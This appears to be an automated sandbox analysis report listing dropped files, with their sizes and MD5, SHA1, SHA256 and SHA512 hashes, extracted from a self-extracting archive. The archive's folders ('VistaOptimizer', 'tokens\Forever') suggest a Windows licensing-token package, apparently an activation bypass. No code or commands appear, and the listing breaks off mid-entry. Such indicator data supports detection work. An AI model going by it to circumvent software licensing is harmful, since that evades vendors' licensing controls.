defcaf79317a1bf2af1d19ecc876c782bcfe78b2ed0b59be1d6b80bf290f07b0e75c3be9ca3964273b1675e89ae118e20fa26b7a5d5ae33c9321550630b51d68

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPC-tabbtn-ppdlic.xrm-ms
Filesize
2KB

MD5
81bbf79232267782b6ca6583edc741bc

SHA1
d386feaaaf5c97c2e948f922dea7a0ac00629142

SHA256
ad68ac46027d6ab2957039363a9bdaff39007291af02281c06171835016ee40c

SHA512
b176fcbfe64e8950ad323bd1e3132b34477ab8b6ba49f6af6858d3d63ea979a0c60d3748ceff759f0d34e19bb804a7ae022cee08f331f092c10e0832ee061227

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCAccessories-ppdlic.xrm-ms
Filesize
3KB

MD5
cb31813f2805d3698ca7bd55d99092d4

SHA1
85947a0e3b794dc16984b883f3b3993eaed7dfad

SHA256
a40725024e549d1979e18510190f9d02ec088ab7ed3178e2db4069b901042e34

SHA512
8d099432245ed722707c503084b1d1a629e8c1f3b69d2ffee7dc6d3c2fd798429463f1423dd50a3f6088dbaebbc0ca7b37196ad356faaadb3288f5ee1d3f9154

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCCoreInkRecognition-ppdlic.xrm-ms
Filesize
2KB

MD5
149d1b24df36956cb0331f7f8cee54ad

SHA1
479ada396bfd24c83e79d4e76e894f72c17d6a7e

SHA256
5d21f98296b4527df4b1c0d19b61f060f51dcfce41c12d59d8473e6b7db214d0

SHA512
b401898e6b55236de11c8233e3fb576495f30220e49f8ec5aa42fb2d95e37aaea2b2eddbecf88f4755a3ed459fd389040cb245341564ec8de01557fd126604cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCInputPanel-ppdlic.xrm-ms
Filesize
3KB

MD5
76df706a75912ad4a0848db1fe7dc828

SHA1
d0a7a17b0f5b23082b112d24dcf2940240f3a9fa

SHA256
33dd1f53221d3513bf5b29b8a5903ee4250032c5439e3358cd47bf905d2648a9

SHA512
24107d1b3d637a3f8b06d2946d9eedc2e568ae69225661a0ba3f7b3caef134aff33fcd76d0a7f551b7e45668e3b59d9c3c305bbc3bccb5e873425b647d1be861

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCInputPersonalization-ppdlic.xrm-ms
Filesize
2KB

MD5
eda1a44cbfd4823ff729c0c2980f4b19

SHA1
d942ca57433e7b5a9b4897f3dae6e79c62a0bab6

SHA256
19f7c0e437f0e1aac79545259992900afb4e39bcfb4f0b2c262d106566e64503

SHA512
e435edac80df8089eba758ad81ef1238dcdfde3a4cf2556abb73cc588a2e4ef05c3452dd90a01f108ea92977a7ecffa907d9f9b1a5938b044a79c6f93a9e4c6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms
Filesize
2KB

MD5
186016555b75261bcd0f9f14711417c3

SHA1
cbae3243fe292e9c4787c26ea62c904260276430

SHA256
3ce0917467b3efd51e1877e2837df2341b95d25d271217fac16d0a2d743be5db

SHA512
d468bf659715ddba92fa4b85566013b827ae95144f1d23b05936ab037d31634e2bffdd1dd7fd19215a7af412ced4eead9a29aadcf6096c62b0470ec8ce3dac22

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\WMPPlayer-ppdlic.xrm-ms
Filesize
2KB

MD5
d0b049f0a759818178a86b8a8ee85a56

SHA1
f4f2da7147ff4ec991c3dc237b71d769054f3a43

SHA256
88c73f28b888a7ec4d757838ea8ee192e5825c71fe90bd716fd1df60663865d8

SHA512
61b7c09d1c34409ec9b3d224b7535d8d795e0b5ef1a61f9798fdf577c1ca05319741ec30aa5b10988a806aea9d05cfd4f570e9057c177731a7f2e8d4d96b2b7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\WindowsSearchEngine-Licensing-ppdlic.xrm-ms
Filesize
3KB

MD5
d812e4424e0e32644a86a8043a0e848e

SHA1
4fda14dc0c1b6de73b6940db6cb72f1463922332

SHA256
0a384355a0b4d3915479ce1f984c8a304431f2ab27d802aa709537141e250ebb

SHA512
0115a8acbc715b3d7c7ce4b5d8b68fba6fb8bf73e71741dbf6414b1802b0875130ebd925d8b566ea0951828019b9cc2eedb43831e637f66344cbc314709c0422

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\ACLUIFileFolderTool-ppdlic.xrm-ms
Filesize
2KB

MD5
07048bfce5c63df5ce18db9f2c3e7e5a

SHA1
758328d7c7ce4ed279b53dcf6de5aceaf1320b7b

SHA256
be6f503e27816b8ae07ec05788bcdf449d4317ddaca093d97587b1b19487de3b

SHA512
130ef3601a4ffda91f2065f2b6efcef43a7429b4c8ed49f818464ff676b94437c6c5c3fd4f7ec333fc3a68a38ca6d2c09c226b3c23826636126356db0cf4c9ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\GroupPolicy-License-ppdlic.xrm-ms
Filesize
3KB

MD5
8aa272b295a648066b2a4ed3ce735cc2

SHA1
5fad7788cffac50ecbdf06bb3cba1e0460528b02

SHA256
240942b86d2d82e5244c7a30cebeb53f9648fe8d3bf04d39c01340c715170aca

SHA512
415e8dfc46f3f7f06cbfc5775818ea95c865b3fcbec1615f36598b68e396fae1de32468632c4b192d7d7b442574381378f306d0a97b631e1ba55abd1569af398

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\IASLicensing-ppdlic.xrm-ms
Filesize
3KB

MD5
145bc852020a15cbf1c266f227d24175

SHA1
90f7d299e3eed3dc508f35e008896c08169137bd

SHA256
def11a1ab9180f235d2233afdfff1b95d3cd9d5861560cce81876e7b2f463012

SHA512
f7d16e109ea05977e8cc2e78d10c2a91da43b9c16b947bef5525e64e636514078f030f454deb6e2cf8fbda8851ba8d9e2628c3b85b0b06dbf852b462e594f56b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Kernel-ppdlic.xrm-ms
Filesize
4KB

MD5
010255f2a744182d2e7de3cf62a04386

SHA1
3d62aa84dbb22854c16032e775d564f76ebe18be

SHA256
ef23ea9ffad3404a4ca42561cb400ee9a6e59fe8fa076d0af87e93c50371a0c9

SHA512
4cd2a03581d94a875dfc8f4fd9248aba76f9dbdeaf8a528d9ea589862cb2305eddeb85cbaa5eeabf13366e07722018cae322975fd46a03cfd46928588a1a9326

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\LSA-License-ppdlic.xrm-ms
Filesize
2KB

MD5
693ce90f47a550bad0ef38fa5597ba97

SHA1
496d58bb638d8d13174415841cb9138492bed0f3

SHA256
f3f1bdf5524cacb5f5b62f7d4e484757ea485b2a8463d1d39fe19fb7492aa7f6

SHA512
bc7befc8c60100a4d1658f238a7486979f5a4df86e22fe9471f803414fd763cdd95f7cc57c442a1d78d6bba26842688b9c7469ad951cdda34970a212d6aeb491

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-Core-ppdlic.xrm-ms
Filesize
3KB

MD5
db42bd1f9f070d51f164ebfd4f3b6b73

SHA1
9be4afb376746da087e0213b3a61b9ab5839d3db

SHA256
ff66ec48527685ce2db54495908800ec0bb31c6d215b83e03728f3eae2abdadd

SHA512
7e84c91aef83b60bf8b168d2a5a8d6076a7a8c63c8427b5bd013c37f6a246b19572a3d87b850a15eff2735eaebf5352c6d67afe2e09a236d2887d53a3f81c8f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-DesktopWindowManager-Core-ppdlic.xrm-ms
Filesize
3KB

MD5
7ac4a762939afa908557abe7ea3feb4c

SHA1
cec7f1d321f96760861d76b7d81d56a6ae1e3d49

SHA256
c8b53762be3ff5983cbf4b2e1e11b98b9e769f5e1619a0903bae007bab1059fe

SHA512
44fb529102519d4a2fa892228cb63f2f26dfc40a765273e8807d4878571af19b0fd6a9e4de6ae32f11e1a3727053d845b8e20ce01f4a401e096580644c51e80c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-InternetConnectionSharingConfig-ppdlic.xrm-ms
Filesize
3KB

MD5
004edc151be054f27529bac1e91075f8

SHA1
b79428ab8a224619f8d8dbae49268ac9406ac6f5

SHA256
c6de9449971090c3afa9a1de1e3e112a5e1b9227f7301b032ceaf9eb1b1e4458

SHA512
8add1453dd69b7a978743e4a2669e5cde159debf307a610ddade599f5d304ea3b5918d0dcc4f2cdfeec2b9dd6ad7fbdd391b1161361dd8fd2969f980b8778c1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-NetworkBridge-ppdlic.xrm-ms
Filesize
2KB

MD5
89707824f9eb5d4c6bff43c24b8b67d4

SHA1
265ac3821adb755387235457b4edf6c18167d575

SHA256
58bc96e14a3c9aa192853ab26e3e9343b3660d82be997ae557c4b1f37b8b0832

SHA512
6116a25a605fd30c3a59576f4ecee2f5bb953d445a76ae80245154ced656b3d90818086c0499aa4e23caf2bdb8865d1ebaf60afe0a745a4962068731988421cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-OfflineFiles-Core-ppdlic.xrm-ms
Filesize
2KB

MD5
dcabbaefad41b57639ab40f6549b092b

SHA1
56a16b2c5a4230fd064ab320ebe1595ad7fe1485

SHA256
7125bccd953808e3e41cb535e6fc41ac68e7131aff7812f2ffaab61fea5081b8

SHA512
24ce408a4486118de9ccc27c44e2828cf7a4339529a3c51e44f0bb08ac414a0c4c5a0c91a15315e444fc60194c7bfe25d34b93caf938f76f41ab478e31c04bb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\PhotoMinFeature-ppdlic.xrm-ms
Filesize
3KB

MD5
97c82d90ac5c191fa7d25dbb17453a14

SHA1
5eedeab919c07973ad29d28dc73ea274856437ce

SHA256
89ca566d3dc108c9cd13374d6e2bac520807ec5fdd74799f1fcbcb2eec3aae2e

SHA512
4b6edecefd43be3a6029bfb830c212c6575a0f30ccd0810d2fead51ca40b1ecfb7b9be731ecf36a144f5dccd560908a935eb221cfd7b0567fa90d9f14452ffd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Printing-Spooler-Core-Localspl-Licensing-ppdlic.xrm-ms
Filesize
3KB

MD5
6c8a514c947d8cad0c46f08b1151803e

SHA1
5652386e653da4f9eed839194ee8c883183bf62d

SHA256
683c360e28b4d386df6af4828d756aae1e3eac86f6a08b0e5b29fe99df81d358

SHA512
21dc5bab7228aea531aee2d854f0f9e07b352e8b3836535de70a21c3e4a0d597840b366906af3934d41ae0e5449b092acd205c37841393633c08c0528912f32b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Printing-Spooler-Core-Spoolss-Licensing-ppdlic.xrm-ms
Filesize
3KB

MD5
a30b7723a419324978d6dc3b770159f9

SHA1
0e929af2e93aab7855dac3faadfca8157d70dc69

SHA256
b719bff57185e7a17038e08e38f9dcd8f7b0f40ed94e0c59513fba2fd9845cf3

SHA512
18fdf625b6e4a9538ab0193f587119e926dc37a92f270bfb6e9168115c3c953150c0512aafd42e910427e7cedd94687886a89e3d92c47161d1c35f6823b785c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\RasBase-ppdlic.xrm-ms
Filesize
3KB

MD5
718e97ac13cee5902e3fdbc8e5c07b75

SHA1
fe7e2ed1afc21ad1523a44333516b01839e45c10

SHA256
0fd10296ea6d14403aedb51a8c03046cdc7a5dcbf9dec86f774d3a8598f06c23

SHA512
375accc721e7292fd3d01ee1446693bbf8ec2b25b7718a3094f9bac6eea16eb089f724f07efb7ef18bc0feba5fa0a86b09ebc7e7fa14205746740734fb0371a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\SMBServer-ppdlic.xrm-ms
Filesize
3KB

MD5
7443ebab04bfac164d28e5a246849540

SHA1
5fd4a8ba3a20c5fd5d9769c3c1fcd7193b2b1999

SHA256
abcc57d5c4cb48f99bab71d9855f55b05503b3e4362983e7ff05b9bc366a2322

SHA512
f43a8f94bf99020dc0c32fc9e3852a8537d6597de46fb9490af5add4841efd044a88e36a3daae03b305e47b9caec9adcb1fa632f8c83f5a46e27cd09b9b62fdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\TerminalServices-DeviceRedirection-Licenses-ppdlic.xrm-ms
Filesize
3KB

MD5
c446b03359b9d7c16545fd35c40d6e1f

SHA1
da4efb3594ec69bec631258785939668271519fa

SHA256
acc5c5b9d1845aa070d2aa2b2c36a7b50c7d3ff7d7f67dcf4469f26f3f50eeed

SHA512
65f62bc8ad8351db02f896177fd7a36d949dc26d05d7e8d747f9f893e760d1918d8673a6f31eae5d8232ef69476a739ab34ac769f17df5cd502b0e7c80925925

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\TerminalServices-RemoteConnectionManager-License-ppdlic.xrm-ms
Filesize
3KB

MD5
d40c66c818895f073a3e617f3a466c00

SHA1
ad2f5da5155e8554378f05b307525de92e6c01dd

SHA256
a75faf733fb9dc1ae611cc8dcb951d849c2fb4bfca175740268e9cb2f9fdb891

SHA512
7820f84d369a2e7ebcd32457ef53ea751524b9f9af97f1992d97ca45e4a4a2229c3ad04faf64de6dc424b1a75002be3dcd40246e733ed9b137c4928b6be1822d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\TerminalServices-RemoteConnectionManager-UiEffects-ppdlic.xrm-ms
Filesize
3KB

MD5
72830612581636025945e1c460b1386b

SHA1
b0f6e67de9ca0062c14d372a883c5949ac673045

SHA256
f6dd46ea39a61bcb8259be6edeab5dc269c314e903ce95c91f0015f631b747e0

SHA512
e5f3a2c068adf49aa34c923a51567007b1e933e3174db1f5a828d6a6209df715c9fbd5bcaeef6c261fe5cf4307665a7d45249281f8ceb39411d2e93bb4cb5c5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Winlogon-Licensing-ppdlic.xrm-ms
Filesize
2KB

MD5
e043eada7489a167b0205e08488dad37

SHA1
1bef19c24475b5b3300e5811136d7def6d85d5d4

SHA256
5bf2f6a7830720d9113098fcdc384bd736e7fc1caf95bf8bd6842dc64e33bb3d

SHA512
6269b85c7508f78b63bb0dcfcea1073e4d62048e0ffb831ddada2dcca4f25d839850b0729e3d43a83ded3ff12691a3f7141a728a9acb2d576f50283fe649b45a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\WorkstationService-ppdlic.xrm-ms
Filesize
2KB

MD5
b847bdb96f62f612d78430a38763be54

SHA1
590f1220e464c61cbdbcbc1bc11d9e9778643c17

SHA256
3f332d43eafbcbcbaba7561bc6024484f8722fcc2ee5b6702a155d5700675d0a

SHA512
c623311a7f3af27f06cf8b9341c862ef8b0595ac440109eb4a25c3798956a8a402b8dbe8a7eec1d891d10752ba0ac161bb074b8aa081c8a214af57e2f46027f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\explorer-ppdlic.xrm-ms
Filesize
2KB

MD5
eeef7b6c4ce548e031d7fca8a06cc697

SHA1
e98fbd5f5182b398b58a8d89145c9cd61a50921a

SHA256
ecba5cf4114af056c705d284468d5b53369c9ef432fdfb1cd1ade8b16916e7f4

SHA512
67d449d394fbf2d31e1222a15a202c1a00ce5b52d5dc294310966b168fbe7170b14bf29add5a3236e06d3ec1a3d14df3bfa37fa41c69458d0a8934dbc8712550

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\feclient-ppdlic.xrm-ms
Filesize
3KB

MD5
9e5648e9a5ed9839107d9261ad06868c

SHA1
2e9ad9cc89f5241686730aa20ed8f56d5529c01b

SHA256
52fe13314f51b444ec6f95f4accfc520851257123a0d010e7ff01a0f9bb5114a

SHA512
56948386d009941682287d847965de56d6a441f6bae2a72e30f857e18f432241128daf75dda92233747116d0f2f9b7dbc6464ef878a6cab309b3351b84b73b2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\shell32-license-ppdlic.xrm-ms
Filesize
3KB

MD5
f4ce1175aeab77a6ec1147603b2c6231

SHA1
a044f65d109805b784a8a48c3edbe8be19d70ea7

SHA256
9622176b54121191ad63a74484b64ad506860d7afd9781134dbc929ddc9f9de8

SHA512
04fd5aa4c9a6d82437a57a5f87576d55b8f79ac25a9dd2c7574d18ca6df07c4aa534294232d573cc5df87e9d172fd45d7f9d59d0f618576bfcff4efcac29d6b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Enterprise\tokens\ppdlic\Security-SPP-Component-SKU-Enterprise-ppdlic.xrm-ms
Filesize
15KB

MD5
eaec7e4a3e040bb6e5a5a7060c4ea03b

SHA1
485fa3647dda6f22534681bc381ac07ed701d204

SHA256
882e5f99fac15f101e70aecd6c0852eec94e2de0c222d7e1b51d8d248c6a6965

SHA512
dbb63159ad0650297dc36bfe81ef20f16d1a0a56f9679b36993a8dee4745054c32186038fc0f846a6face02fa2700102845f8b6e6d1b38f6c187208a0438c5d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Enterprise\tokens\skus\Security-SPP-Component-SKU-Enterprise\Security-SPP-Component-SKU-Enterprise-ul-oob.xrm-ms
Filesize
12KB

MD5
f32a413f1c3d59176da9828cfd048187

SHA1
bbefda8674fdb190b93a735fc60404bc58b819d7

SHA256
f4ec66c62e86859d2b7f32541c62dedc4fc4ed3d467e8400a656707b20f02850

SHA512
7784424f184a45b4fdfe1251ef23b10c98f93888aab720b627a8c2e30aa0a2a74142cf4213a7b6f58235b351d79262a44f94cdbfd8de98b1e973febabac13db0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Enterprise\tokens\skus\Security-SPP-Component-SKU-Enterprise\Security-SPP-Component-SKU-Enterprise-ul-phn.xrm-ms
Filesize
15KB

MD5
4437534428de9511706a3cac35b16101

SHA1
884e567eb91510873b9abcb4c92c51f34db807cb

SHA256
77caa1d763bc6a62dab31caed11bf7dfd8f2f1b56ff8e1a3f4057082cf98977e

SHA512
32aaee95c2f9a5d2a021c38a388b4776fb1a58b9d943ac2bd7ba1452535b907409811aa8dab8fe3762ccd8f3f4c571153d3a53c6526bee7dae41fed3548a1f18

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\ACLUIFileFolderTool-ppdlic.xrm-ms
Filesize
2KB

MD5
2b07d90c6f9b04ccb82191029609099b

SHA1
4d676fa6197b7511d60dd03816c5d72589496d4c

SHA256
032562ca252cef56ce818ca806df8dbd77b7e0896b7536bf387acd5f616034ef

SHA512
ae3330135f03c268fb060c5add9bbb3ec48efd05e5100e0ee9cc3583a2c5d1b69cd9f914a6363d747a68d65952793e1d6420f16e411832b9464371ea660ecb76

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\ChangeDesktopBackground-ppdlic.xrm-ms
Filesize
2KB

MD5
251b382de4f350addebe9202f5ac6624

SHA1
d3d4c736a2cabb8db0990e7ebaca2c6efef7f060

SHA256
dae9dcb82a1fc07ad6c9800143654634b6bf1e6240b40aa164d8e95c4a1f6b62

SHA512
6fe137e252b0e03fc06b9e93f072c1a4f53196488ea839467cdc87b7cbfe46dd82e15d897bc35c804d6d95c32bfd3fe511b352fc2d93d4af23a33bc5e9a6da46

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\DNS-Client-license-ppdlic.xrm-ms
Filesize
2KB

MD5
7756bb922ada3f52d1f50e8988246cb4

SHA1
958a64d5c9fe9416d77293cab4e8b098e9e85b73

SHA256
c58d4cd6ae42863b111f46869949e0467d53ca0eff04c4a7084d8d4d257f10a5

SHA512
9a570e632af55231cbff69fee9dad600ccf406b0263d7945c134b040acd8cd1bc37f630dce80283ad24aacacee1341abbb79c7a1cfe25c45fe89c26dfc5a0a2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\DirectExperience-ppdlic.xrm-ms
Filesize
2KB

MD5
1228499706dbd67ef64e2655bcf1280d

SHA1
daabba98af2270775f02de2a76494a6c48ef8754

SHA256
83f7ef0bf97331aaccc884266dcdb6be2389fafa16afec0ff22c1cfe2ba52421

SHA512
8e1130569e80fe6eccd16b964a4d36224946f23b87f23f2303e9961828b886a0941c9d241acf5e941a22d5727a9f7ca637e843fc0a55d0dc72964e4d1279ffb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\GroupPolicy-License-ppdlic.xrm-ms
Filesize
3KB

MD5
fa5086f58e8f932241c11aa95793e2c1

SHA1
13ded8cba00f73b61714ebc1522ee4ed76eb39c6

SHA256
39b1824c863f54359c7db73c3ab31f9f02cba1d7b468f21b017224dc8194ed1b

SHA512
89dac1fafecdf1359ebf549715deb8fa63131c5cb3a5a01cb64d6d601501f7bb57b881d4d93ba57028aac95f8a4d5b91927d79f7c250de173b87edf3820330e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\IASLicensing-ppdlic.xrm-ms
Filesize
3KB

MD5
4280e9e5bc22508620a384c43817e75a

SHA1
b894b6ff5cd8eb750de50c66d33c8b02107f80b2

SHA256
6204106d9744b056950c05d8eee1367e1aad1ec6a8a5a597b26a29ecd121c6a6

SHA512
ded077eb0ddeae28cf273d126c87c80295144d175adef0263f4285cde1ef3dd0ac3383b6db7e24320a694bb396b558d1a80ef4be05b2f9ac3905e3c3e93cf50e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Kernel-ppdlic.xrm-ms
Filesize
4KB

MD5
2f271db1298e877eeea0fef3d10142d7

SHA1
6961cbc5d6ba29365fea56180beecaab8796a141

SHA256
cdd917b6a4e89493b26c295a5d538973d526dffe7bfedbf2e22359d24250004b

SHA512
e0f79ac2f07859ca876113e82c15da85737fcb00bf89f5fef658f5e3522ecc22e0c0150f5b5b1589ce9c5883c562637b7968db6925e204dd830db1b16511ea12

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\LSA-License-ppdlic.xrm-ms
Filesize
3KB

MD5
9d7c5200b61f953120941ac7fcd7fcf5

SHA1
4049deefd1b74d426007b92142a4d0f0741744b1

SHA256
12d9d6d044720d681bb98ff805341c3db1144ea1dae7ca0c3455a898ba415ecb

SHA512
e2e8e79aa9f0e7c2d0f6f7dfa2f6839fd2390b24a3944353c3d693fb4cb20d777df6c6fa63d0177ce3fbd5495085ccbd513ded6ebb8f2e2af0e7d070dc6067ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-Core-ppdlic.xrm-ms
Filesize
3KB

MD5
b206c05031dda75f4eafdce12553547a

SHA1
722ac92fc1d39be5afa2e0284ba79305d22090ed

SHA256
3a5d2084ae0b79d4f362049d5eb163264fc8058acb6ffb561f41a648926ab154

SHA512
79d5b6ac6b3036479e268b47a2c7c322d991b596503d45aa16fc2a5289c230968bdabfde6de96a68d987644b09a6a2d7498997d6bcea4c6a1f2134af131cc27e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-DOT11PREF-ppdlic.xrm-ms
Filesize
2KB

MD5
4b0b6942926577bd62e8a23445b245f0

SHA1
4b3e78e94d920c4bf8ee4e199651dd40696934e6

SHA256
1f51eab331bf1c95284b17f583b730a157517123af4e4ecad700007b05aa615e

SHA512
a51377cc34133469f3f31feb55f4709f6922a5cfa0fb948804ccec7029dfbf1af5d101f6684790ace879be7324670d4f011eaa889162ebddaa5de302b48198da

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-DesktopWindowManager-Core-ppdlic.xrm-ms
Filesize
3KB

MD5
5528b6d1c60f088625d304690d8296ab

SHA1
e0937bad179bac3e1fff833fefcca453b4d3d0f0

SHA256
2f3210da0d80a3e02f17527da31058509c4612c7ffa94c92276bb6175633ea8a

SHA512
96a5c6521afa4f241be0e88e14a3f5a365293fa45599c1f55b81fddb0e71426bbe0b0026eca196e9c6462c7275dce0a942490c255cee7aa7c32925d3058d9e3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-Fax-Common-ppdlic.xrm-ms
Filesize
3KB

MD5
254d4a7871d284c00755874ccf99303b

SHA1
b7ccebafc995ed9b7ff270ff8ef7c0fd85888770

SHA256
959d5c6899d354daccf6ebde5bef5171a6321dd5917ec71a3731c5a59db084ba

SHA512
cd4ed15b4256db8ee913b861fc1f4154bf26afc59a46bb1c2881982642aa5a2fe4362e1ebe61bf6bcb454b67ff375c46650ff9294eaa2c6ccbb44aa9b70635e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-InternetConnectionSharingConfig-ppdlic.xrm-ms
Filesize
3KB

MD5
496c412bf6aa299d21e9a86898ca8569

SHA1
a38443d079cd05e93233750490383fe0df40dbd1

SHA256
cf5db87c483b03dcb1161673e60512873dd0c3c398641617f1d257b82a576c0a

SHA512
42e6e0e8720bf968834d142237c33c56a2bdab15ee4bb7014c42477adba82fed972e563a48af1e216431046fd9d30f88dd66bdb085131f6f02d956519f5d113b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-NetworkBridge-ppdlic.xrm-ms
Filesize
2KB

MD5
8710a5c32811b2d81364094902e987b4

SHA1
7dfb0986dfb65e1f641d1a7bf8b2295300eb7389

SHA256
f883eae6787349486110046c1cc7d5045ddab819d825eaba2fe59578daa8d962

SHA512
d325a312e019358501b529fd941c07d24eb8e0cfe7db3d2616f25c39c3b443a55742be32f51bffe9f822ce0347aaf3304210f9ad22ee29ba054cf1f45eaac966

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-QWAVE-ppdlic.xrm-ms
Filesize
3KB

MD5
3a7d973e5a523ba81b0a99dcb412c4bb

SHA1
e405c2b9078ca0091c8f1a25ca18fa2507d7efe6

SHA256
d95f9fa4f9139e5c4857d45dab4e9f6a2792532da188cd5e9ef64e39100f9aa0

SHA512
8b0025f60e076a3ba3e0a316300a486dc5390eebe0c91584435026962abbd4c394aecd9b3b9d8351ef25f1cde82f6aea2049abf7dc869401420fcd09e0e7d747

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-SensorsLicense-ppdlic.xrm-ms
Filesize
2KB

MD5
71469ac8a38b3e7563ddd50509ed09a4

SHA1
546e55851e1201bc91f35ea8546d89e203deabdb

SHA256
99be3013e4281a7f7a7337abd3c22b2c705756014fdcb086b527d2d27900fd35

SHA512
1ae994e5d4357df0d8f3dd41689b654b19e3a951d8c4d843ed16e7bbd5ad158ce053d93cac4bffbd63ccc606a79c258560e713b8b132e001e9b0cdd4058d6652

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\MicrosoftWindowsSafeDocsMain-ppdlic.xrm-ms
Filesize
3KB

MD5
